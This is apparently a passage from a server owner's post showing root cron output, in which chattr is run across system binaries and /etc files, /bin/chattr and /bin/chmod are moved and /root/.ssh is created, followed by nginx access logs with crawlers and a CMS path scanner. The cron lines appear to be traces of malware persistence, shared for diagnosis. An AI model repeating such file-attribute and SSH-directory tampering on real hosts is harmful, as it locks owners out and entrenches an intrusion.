Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/pasteurize-2.7)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-cgi)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-pear)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/php56-phar)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ping6)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfaddtable)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfgettable)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/psfstriptable)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/python2)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/reset)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmquery)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rpmverify)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rvi)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/rview)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/scsi-rescan)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/setup-nsssysinit)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sg)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sh)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/slogin)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/sudoedit)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-coredumpctl)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/systemd-loginctl)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/tclsh)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unlz4)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/unxz)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/view)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/x86_64)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcat)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzcmp)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzegrep)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/xzfgrep)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/ypdomainname)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/zsoelim)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (mv: ‘/bin/chattr’ and ‘/bin/chattr’ are the same file)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Not a directory while trying to stat /etc/crontab/)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/favicon.png)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub2.cfg)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/grub.conf)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/init.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/localtime)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/mtab)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc0.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc1.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc2.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc3.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc4.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc5.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc6.d)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/rc.local)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/redhat-release)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (chattr: Operation not supported while reading flags on /etc/system-release)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (mv: ‘/bin/chmod’ and ‘/bin/chmod’ are the same file)
Apr 1 14:20:10 host-name CROND[25585]: (root) CMDOUT (mkdir: cannot create directory ‘/root/.ssh’: File exists)
```
#Here is access log
```log
54.213.3.215 - - [01/Apr/2020:03:28:01 +0000] "OPTIONS / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-"
106.38.241.135 - - [01/Apr/2020:03:29:20 +0000] "GET /space/vcwortu5/about_us.html HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.145 - - [01/Apr/2020:03:31:44 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.101.182 - - [01/Apr/2020:03:32:55 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:49:51 +0000] "GET /robots.txt HTTP/1.1" 400 248 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:50:37 +0000] "GET /robots.txt HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.145 - - [01/Apr/2020:03:51:45 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.101.182 - - [01/Apr/2020:03:52:56 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:53:01 +0000] "GET /quote/show/id/118.html HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:53:02 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:53:13 +0000] "GET /robots.txt HTTP/1.1" 400 248 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:03:54:03 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
114.119.162.12 - - [01/Apr/2020:03:55:16 +0000] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; AspiegelBot)" "10.179.3.36"
114.119.162.12 - - [01/Apr/2020:03:55:16 +0000] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; AspiegelBot)" "-"
106.38.241.135 - - [01/Apr/2020:03:56:03 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
95.163.255.191 - - [01/Apr/2020:03:58:21 +0000] "GET /robots.txt HTTP/1.0" 444 0 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)" "-"
95.163.255.155 - - [01/Apr/2020:03:58:23 +0000] "GET /buyer/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)" "-"
106.38.241.135 - - [01/Apr/2020:04:00:07 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
198.199.109.76 - - [01/Apr/2020:04:01:48 +0000] "GET / HTTP/1.1" 200 190 "-" "Mozilla/5.0 zgrab/0.x" "-"
184.105.247.195 - - [01/Apr/2020:04:05:31 +0000] "GET / HTTP/1.1" 200 190 "-" "-" "-"
106.38.241.135 - - [01/Apr/2020:04:08:08 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.145 - - [01/Apr/2020:04:11:45 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.101.182 - - [01/Apr/2020:04:12:56 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:21:10 +0000] "GET /robots.txt HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:24:09 +0000] "GET /details/1-p-199705?MSP252T52T2T52 HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:28:49 +0000] "GET /quote/show/id/user-thread-4-47.htm HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:29:20 +0000] "GET /info-id-733.html HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.145 - - [01/Apr/2020:04:31:47 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.101.182 - - [01/Apr/2020:04:32:56 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:33:15 +0000] "GET /space/yxspxcom/document-typeid-2.html HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:37:14 +0000] "GET /info-catid-19.html HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:37:27 +0000] "GET /space/fghjj1234/contactus.html HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
106.38.241.135 - - [01/Apr/2020:04:37:37 +0000] "GET /info-catid-4.html HTTP/1.1" 301 162 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.145 - - [01/Apr/2020:04:51:48 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.100.82 - - [01/Apr/2020:04:51:49 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
58.250.125.185 - - [01/Apr/2020:04:51:50 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
49.7.20.28 - - [01/Apr/2020:04:51:50 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
111.202.100.82 - - [01/Apr/2020:04:51:50 +0000] "GET / HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" "-"
58.250.125.185 - - [01/Apr/2020:04:51:51 +0000] "GET / HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" "-"
49.7.20.28 - - [01/Apr/2020:04:51:51 +0000] "GET / HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" "-"
111.202.101.182 - - [01/Apr/2020:04:52:56 +0000] "GET / HTTP/1.1" 444 0 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "-"
35.238.244.53 - - [01/Apr/2020:04:53:41 +0000] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET / HTTP/1.1" 200 190 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET /administrator/help/en-GB/toc.json HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET /administrator/help/en-GB/toc.json HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:42 +0000] "GET /administrator/language/en-GB/install.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:43 +0000] "GET /administrator/language/en-GB/install.xml HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:43 +0000] "GET /plugins/system/debug/debug.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"
35.238.244.53 - - [01/Apr/2020:04:53:43 +0000] "GET /plugins/system/debug/debug.xml HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" "-"